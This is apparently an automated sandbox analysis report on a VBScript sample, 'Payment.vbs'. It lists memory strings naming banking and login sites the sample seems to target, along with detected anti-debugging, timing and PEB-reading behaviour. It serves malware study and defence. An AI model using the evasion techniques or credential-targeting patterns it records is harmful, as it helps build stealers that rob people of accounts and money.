Source: wscript.exe, 00000000.00000003.2355026871.000002AAA868D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2355751447.000002AAA86CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2356926443.000002AAAA501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236842751.000002AAAA430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2356219177.000002AAAA601000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236789299.000002AAA86CA000.00000004.00000020.00020000.00000000.sdmp, Payment.vbs	Binary or memory string: pBimoLvibqemuGW = "GNPOmRvLiTCWsbi"
Source: 62v53-Zo.19.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 62v53-Zo.19.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: mNqSPruzCXM.exe, 00000018.00000002.3536283378.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: powershell.exe, 00000008.00000002.2481444868.000001B5FF6D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWY
Source: 62v53-Zo.19.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 62v53-Zo.19.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 62v53-Zo.19.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 62v53-Zo.19.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 62v53-Zo.19.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 62v53-Zo.19.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 62v53-Zo.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 62v53-Zo.19.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\appidtel.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\appidtel.exe

Code function: 10_2_0397D1C0 rdtsc

10_2_0397D1C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\appidtel.exe

Code function: 10_2_004179B3 LdrLoadDll,

10_2_004179B3

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D539D mov eax, dword ptr fs:[00000030h]	10_2_039D539D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h]	10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h]	10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FE388 mov eax, dword ptr fs:[00000030h]	10_2_038FE388
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0395739A mov eax, dword ptr fs:[00000030h]	10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0395739A mov eax, dword ptr fs:[00000030h]	10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h]	10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h]	10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F8397 mov eax, dword ptr fs:[00000030h]	10_2_038F8397
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392438F mov eax, dword ptr fs:[00000030h]	10_2_0392438F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392438F mov eax, dword ptr fs:[00000030h]	10_2_0392438F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039333A0 mov eax, dword ptr fs:[00000030h]	10_2_039333A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039333A0 mov eax, dword ptr fs:[00000030h]	10_2_039333A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039233A5 mov eax, dword ptr fs:[00000030h]	10_2_039233A5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BB3D0 mov ecx, dword ptr fs:[00000030h]	10_2_039BB3D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0390A3C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039083C0 mov eax, dword ptr fs:[00000030h]	10_2_039083C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BC3CD mov eax, dword ptr fs:[00000030h]	10_2_039BC3CD
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039863C0 mov eax, dword ptr fs:[00000030h]	10_2_039863C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D53FC mov eax, dword ptr fs:[00000030h]	10_2_039D53FC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039363FF mov eax, dword ptr fs:[00000030h]	10_2_039363FF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039103E9 mov eax, dword ptr fs:[00000030h]	10_2_039103E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF3E6 mov eax, dword ptr fs:[00000030h]	10_2_039BF3E6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03920310 mov ecx, dword ptr fs:[00000030h]	10_2_03920310
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h]	10_2_0398930B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h]	10_2_0398930B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398930B mov eax, dword ptr fs:[00000030h]	10_2_0398930B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h]	10_2_0393A30B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h]	10_2_0393A30B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A30B mov eax, dword ptr fs:[00000030h]	10_2_0393A30B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC310 mov ecx, dword ptr fs:[00000030h]	10_2_038FC310
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C132D mov eax, dword ptr fs:[00000030h]	10_2_039C132D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C132D mov eax, dword ptr fs:[00000030h]	10_2_039C132D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392F32A mov eax, dword ptr fs:[00000030h]	10_2_0392F32A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F7330 mov eax, dword ptr fs:[00000030h]	10_2_038F7330
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD34C mov eax, dword ptr fs:[00000030h]	10_2_038FD34C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD34C mov eax, dword ptr fs:[00000030h]	10_2_038FD34C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov ecx, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398035C mov eax, dword ptr fs:[00000030h]	10_2_0398035C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CA352 mov eax, dword ptr fs:[00000030h]	10_2_039CA352
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03982349 mov eax, dword ptr fs:[00000030h]	10_2_03982349
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5341 mov eax, dword ptr fs:[00000030h]	10_2_039D5341
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9353 mov eax, dword ptr fs:[00000030h]	10_2_038F9353
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9353 mov eax, dword ptr fs:[00000030h]	10_2_038F9353
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h]	10_2_03907370
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h]	10_2_03907370
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907370 mov eax, dword ptr fs:[00000030h]	10_2_03907370
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A437C mov eax, dword ptr fs:[00000030h]	10_2_039A437C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF367 mov eax, dword ptr fs:[00000030h]	10_2_039BF367
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393329E mov eax, dword ptr fs:[00000030h]	10_2_0393329E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393329E mov eax, dword ptr fs:[00000030h]	10_2_0393329E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393E284 mov eax, dword ptr fs:[00000030h]	10_2_0393E284
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393E284 mov eax, dword ptr fs:[00000030h]	10_2_0393E284
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h]	10_2_03980283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h]	10_2_03980283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03980283 mov eax, dword ptr fs:[00000030h]	10_2_03980283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5283 mov eax, dword ptr fs:[00000030h]	10_2_039D5283
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov eax, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov eax, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov ecx, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039892BC mov ecx, dword ptr fs:[00000030h]	10_2_039892BC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0 mov eax, dword ptr fs:[00000030h]	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039972A0 mov eax, dword ptr fs:[00000030h]	10_2_039972A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039972A0 mov eax, dword ptr fs:[00000030h]	10_2_039972A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov ecx, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039962A0 mov eax, dword ptr fs:[00000030h]	10_2_039962A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C92A6 mov eax, dword ptr fs:[00000030h]	10_2_039C92A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392F2D0 mov eax, dword ptr fs:[00000030h]	10_2_0392F2D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392F2D0 mov eax, dword ptr fs:[00000030h]	10_2_0392F2D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0 mov eax, dword ptr fs:[00000030h]	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0390A2C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039092C5 mov eax, dword ptr fs:[00000030h]	10_2_039092C5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039092C5 mov eax, dword ptr fs:[00000030h]	10_2_039092C5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h]	10_2_038FB2D3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h]	10_2_038FB2D3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB2D3 mov eax, dword ptr fs:[00000030h]	10_2_038FB2D3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF2F8 mov eax, dword ptr fs:[00000030h]	10_2_039BF2F8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h]	10_2_039102E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h]	10_2_039102E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039102E1 mov eax, dword ptr fs:[00000030h]	10_2_039102E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F92FF mov eax, dword ptr fs:[00000030h]	10_2_038F92FF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D52E2 mov eax, dword ptr fs:[00000030h]	10_2_039D52E2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03937208 mov eax, dword ptr fs:[00000030h]	10_2_03937208
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03937208 mov eax, dword ptr fs:[00000030h]	10_2_03937208
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F823B mov eax, dword ptr fs:[00000030h]	10_2_038F823B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5227 mov eax, dword ptr fs:[00000030h]	10_2_039D5227
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398D250 mov ecx, dword ptr fs:[00000030h]	10_2_0398D250
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03906259 mov eax, dword ptr fs:[00000030h]	10_2_03906259
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BB256 mov eax, dword ptr fs:[00000030h]	10_2_039BB256
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BB256 mov eax, dword ptr fs:[00000030h]	10_2_039BB256
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9240 mov eax, dword ptr fs:[00000030h]	10_2_038F9240
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9240 mov eax, dword ptr fs:[00000030h]	10_2_038F9240
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03988243 mov eax, dword ptr fs:[00000030h]	10_2_03988243
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03988243 mov ecx, dword ptr fs:[00000030h]	10_2_03988243
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393724D mov eax, dword ptr fs:[00000030h]	10_2_0393724D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA250 mov eax, dword ptr fs:[00000030h]	10_2_038FA250
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F826B mov eax, dword ptr fs:[00000030h]	10_2_038F826B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03941270 mov eax, dword ptr fs:[00000030h]	10_2_03941270
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03941270 mov eax, dword ptr fs:[00000030h]	10_2_03941270
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03929274 mov eax, dword ptr fs:[00000030h]	10_2_03929274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h]	10_2_03904260
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h]	10_2_03904260
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h]	10_2_03904260
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CD26B mov eax, dword ptr fs:[00000030h]	10_2_039CD26B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CD26B mov eax, dword ptr fs:[00000030h]	10_2_039CD26B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03957190 mov eax, dword ptr fs:[00000030h]	10_2_03957190
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03940185 mov eax, dword ptr fs:[00000030h]	10_2_03940185
